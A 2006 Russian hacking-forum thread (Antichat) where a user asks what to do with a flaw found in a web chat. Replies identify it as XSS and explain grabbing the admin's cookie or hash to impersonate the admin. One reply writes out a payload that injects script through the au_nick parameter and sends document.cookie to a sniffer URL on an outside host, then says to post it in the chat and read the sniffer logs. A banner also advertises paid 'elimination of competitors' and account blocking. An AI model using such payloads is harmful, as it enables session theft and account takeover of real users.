Форум АНТИЧАТ - Вот нашел в чате. Можно ли с этим что-нить сделать?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Вот нашел в чате. Можно ли с этим что-нить сделать?

Опции темы

Поиск в этой теме

Опции просмотра

Вот нашел в чате. Можно ли с этим что-нить сделать?

11.03.2006, 10:45

gorevoin

Новичок

Регистрация: 28.01.2006

Сообщений: 4

Провел на форуме:
57827

Репутация: 0

Вот нашел в чате. Можно ли с этим что-нить сделать?

не актуально

Последний раз редактировалось gorevoin; 02.06.2008 в 06:01..

11.03.2006, 11:49

~~Tem~~

Banned

Регистрация: 05.10.2005

Сообщений: 965

Провел на форуме:
5888800

Репутация: 547

Отправить сообщение для Tem с помощью ICQ

Цитата:

Уязвимость через XSS или CSS

А тебе не кажится что это одно итожа, нзвание XSS поставили потому что бы не путать Cascading Style Shit с Cross Site Scripting.

Ты правильно написал у себе в подписи : Учиться, учиться и еще раз учиться

11.03.2006, 12:09

DRON-ANARCHY

Отец порядка

Регистрация: 04.03.2005

Сообщений: 1,007

Провел на форуме:
1204641

Репутация: 412

Отправить сообщение для DRON-ANARCHY с помощью ICQ

У тебя же есть скрипты уязвимостей... че тебе еще надо-то?=)

Цитата:

Shit

Кхе-кхе...=)))

11.03.2006, 12:40

~~Tem~~

Banned

Регистрация: 05.10.2005

Сообщений: 965

Провел на форуме:
5888800

Репутация: 547

ДРОН ты непонел ))) ему нужна через xss,взять базу ))))))

11.03.2006, 16:02

Morph

Постоянный

Регистрация: 13.08.2004

Сообщений: 957

Провел на форуме:
1770063

Репутация: 429

ну так пусть берет тока куки пусть получит.

11.03.2006, 17:06

~~Tem~~

Banned

Регистрация: 05.10.2005

Сообщений: 965

Провел на форуме:
5888800

Репутация: 547

Ты не правильно понел, он Xss путает с СГЛ запросом. Это мне так кажится.

11.03.2006, 23:11

~~Tem~~

Banned

Регистрация: 05.10.2005

Сообщений: 965

Провел на форуме:
5888800

Репутация: 547

можна только хэш админа поймать

12.03.2006, 18:55

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

Провел на форуме:
3212607

Репутация: 454

это xss, с помощью неё можно попробовать забрать хэш админа
если получится его взять, то подставляешь данные админа за место своих, и по идее, если нет какой-нибудь навороченной защиты (по ip например), можно пабыть на некоторое время админом, а там уже как получится...

12.03.2006, 22:16

DRON-ANARCHY

Отец порядка

Регистрация: 04.03.2005

Сообщений: 1,007

Провел на форуме:
1204641

Репутация: 412

Вобщем, к примеру....

Цитата:

au_nick="><script>alert('wvs-xss-magic-string-2125609660')%3B</script>&nicks=1

В этой строке вместо

Цитата:

alert('wvs-xss-magic-string-2125609660')%3B

пишешь..что-то вроде

Цитата:

document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie

потом полученную строку кидаешь в чат и идешь смотреть логи сниффера... а потом.. уже описано, что потом.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Открытое письмо журналу "Хакер"	TheFile	Болталка	34	31.01.2009 21:03
Как восстановить нечитающийся Cd?	novichok	Аппаратное обеспечение	8	02.05.2007 12:15
химия своими руками	silveran	Болталка	43	11.01.2006 22:05
Пиянство	mifan	Болталка	18	03.09.2004 12:36

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход